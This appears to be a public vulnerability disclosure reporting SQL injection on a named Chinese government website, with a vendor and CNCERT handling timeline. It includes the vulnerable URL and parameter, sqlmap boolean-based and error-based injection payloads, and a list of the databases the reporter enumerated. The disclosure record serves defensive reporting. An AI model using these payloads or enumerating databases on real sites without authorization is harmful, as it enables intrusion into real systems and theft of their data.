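2014-02-13: Details reported to the vendor; awaiting vendor handling
2014-02-18: Vendor confirmed; details disclosed to the vendor only
2014-02-28: Details disclosed to core white hats and experts in related fields
2014-03-10: Details disclosed to regular white hats
2014-03-20: Details disclosed to intern white hats
2014-03-30: Details disclosed to the public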
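There was an earlier report for this site. I found that only the file named in it was patched, fixing just the spot that was pointed out. Switched to another file, the injection still works; enumerated the tables and left.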
http://www.gaoyou.gov.cn/gzcy/gzcy_bmxx_submit.php?depart_bianhao=15&depart_name=%B0%B2%BC%E0%BE%D6
sqlmap identified the following injection points with a total of 16 HTTP(s) requests:
---
Place: GET
Parameter: depart_bianhao
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: depart_bianhao=15' AND 5972=5972 AND 'EWEV'='EWEV&depart_name=%B0%B2%BC%E0%BE%D6

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: depart_bianhao=15' AND (SELECT 3893 FROM(SELECT COUNT(*),CONCAT(0x716d777771,(SELECT (CASE WHEN (3893=3893) THEN 1 ELSE 0 END)),0x71786e6e71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rtFs'='rtFs&depart_name=%B0%B2%BC%E0%BE%D6
---
web application technology: Apache, PHP 5.4.7
back-end DBMS: MySQL 5.0

Database: cdcol
[1 table]
+-----+
| cds |
+-----+

Database: gy
[81 tables]

Database: information_schema
[37 tables]
Patch it the same way as last September, and then in a few months there will be another vulnerability report.
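Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2014-02-18 10:09
Together with the earlier vulnerability, this has been forwarded by CNCERT to its Jiangsu branch center for handling.
None at this time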